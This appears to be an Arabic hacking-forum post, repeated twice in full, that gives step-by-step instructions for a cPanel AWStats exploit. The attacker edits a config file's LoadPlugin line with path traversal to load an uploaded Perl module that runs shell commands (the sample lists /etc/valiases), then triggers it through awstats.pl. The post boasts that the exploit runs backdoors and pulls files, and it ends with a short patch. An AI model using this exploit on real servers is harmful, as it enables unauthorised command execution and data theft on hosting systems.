said
11-02-2013, بتوقيت غرينيتش 01:23 AM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
المكتشف:قاهر اليهود(TRYAG-TAEM)
نوع الثغره:bypass PERL safe_mode Remote Include
درجة الخطوره: خطره جداً
السكربت: Cpanel
=======
الثغرة تسربت وانتشرت وكل شخص يقول انه هو المكتشف
ولو تذكرون ردودي ببعض المواضيع انه السيبنل يساعد المخترق باشياء كثيره
وهذه ضمن الثغرات التي لم تنشر ومازال هناك ثغرات لم ننشرها بالسيبنل وخطيره جداً
========
حبيت انزلها بعد ماتداولها الكثير وقام باختراق العرب واحذر منها مع طريقة الترقيع الي افضلها
متطلبات الثغره حساب على السيرفر SERVER المستهدفhttp://www.dzbatna.com/images/smilies/cupidarrow.gif
المسار المصاب
رمز Code:
DirData="/home/user/tmp/awstats"
الملف:awstats.pl
طبعا كيف اعرف انه السيرفر SERVER مصاب ادخل المسار
رمز Code:
DirData="/home/user/tmp/awstats"
واذا وجدنا هذا الملف يعتبر مصاب
awstats.user.com.conf
ويتم التعديل على اخر سطر مثال
رمز Code:
LoadPlugin="../../../../../../../../../../../../../../../../../../../../home/user/tmp/awstats/xxx"
واذا لم يوجد هذا الملف يرفع ملف بالمسار نفسه يحتوي على نفس السورس مع تغيير بعض المسارات
للسيرفر SERVER والموقع المستهدف حتى يتم تطبيق الثغره
الملف الثاني xxx.pm
خاص باالاستثمار يوضع فيه السورس التالي
رمز Code:
#!/usr/bin/perl print "Content-tpe: text/html\n\n"; $cmd="ls -la /etc/valiases"; $cmd=~s/%20/ /g; print "<pre>".`$cmd`."<\/pre>"; exit;
ثم عن طريق المتصفح يجلب المعلومات
http://www.user.com:2082///////awstats.pl?config=x
الثغره كفيله بتطبيق الاوامر وتشغيل الباكدور والوكال وسحب الملفات الخ.......
وهناك عدة استثمارات لها ونتطرق لها بالموقع المختص بذلكhttp://www.dzbatna.com/images/smilies/smoke1.gif
اهم نقطه الترقيع وانا اشووف انه افضل طريقه
رمز Code:
cd /usr/local/cpanel/3rdparty/bin
رمز Code:
ech > awstats.pl
رمز Code:
chattr +i awstats.pl
ومازال للــــpriv8 بقيه انتظروناhttp://www.dzbatna.com/images/smilies/nosweat.gif
ترياق العرب
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
السلام عليكم ورحمة الله وبركاته
المكتشف:قاهر اليهود(TRYAG-TAEM)
نوع الثغره:bypass PERL safe_mode Remote Include
درجة الخطوره: خطره جداً
السكربت: Cpanel
=======
الثغرة تسربت وانتشرت وكل شخص يقول انه هو المكتشف
ولو تذكرون ردودي ببعض المواضيع انه السيبنل يساعد المخترق باشياء كثيره
وهذه ضمن الثغرات التي لم تنشر ومازال هناك ثغرات لم ننشرها بالسيبنل وخطيره جداً
========
حبيت انزلها بعد ماتداولها الكثير وقام باختراق العرب واحذر منها مع طريقة الترقيع الي افضلها
متطلبات الثغره حساب على السيرفر SERVER المستهدفhttp://www.dzbatna.com/images/smilies/cupidarrow.gif
المسار المصاب
رمز Code:
DirData="/home/user/tmp/awstats"
الملف:awstats.pl
طبعا كيف اعرف انه السيرفر SERVER مصاب ادخل المسار
رمز Code:
DirData="/home/user/tmp/awstats"
واذا وجدنا هذا الملف يعتبر مصاب
awstats.user.com.conf
ويتم التعديل على اخر سطر مثال
رمز Code:
LoadPlugin="../../../../../../../../../../../../../../../../../../../../home/user/tmp/awstats/xxx"
واذا لم يوجد هذا الملف يرفع ملف بالمسار نفسه يحتوي على نفس السورس مع تغيير بعض المسارات
للسيرفر SERVER والموقع المستهدف حتى يتم تطبيق الثغره
الملف الثاني xxx.pm
خاص باالاستثمار يوضع فيه السورس التالي
رمز Code:
#!/usr/bin/perl print "Content-tpe: text/html\n\n"; $cmd="ls -la /etc/valiases"; $cmd=~s/%20/ /g; print "<pre>".`$cmd`."<\/pre>"; exit;
ثم عن طريق المتصفح يجلب المعلومات
http://www.user.com:2082///////awstats.pl?config=x
الثغره كفيله بتطبيق الاوامر وتشغيل الباكدور والوكال وسحب الملفات الخ.......
وهناك عدة استثمارات لها ونتطرق لها بالموقع المختص بذلكhttp://www.dzbatna.com/images/smilies/smoke1.gif
اهم نقطه الترقيع وانا اشووف انه افضل طريقه
رمز Code:
cd /usr/local/cpanel/3rdparty/bin
رمز Code:
ech > awstats.pl
رمز Code:
chattr +i awstats.pl
ومازال للــــpriv8 بقيه انتظروناhttp://www.dzbatna.com/images/smilies/nosweat.gif
ترياق العرب
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
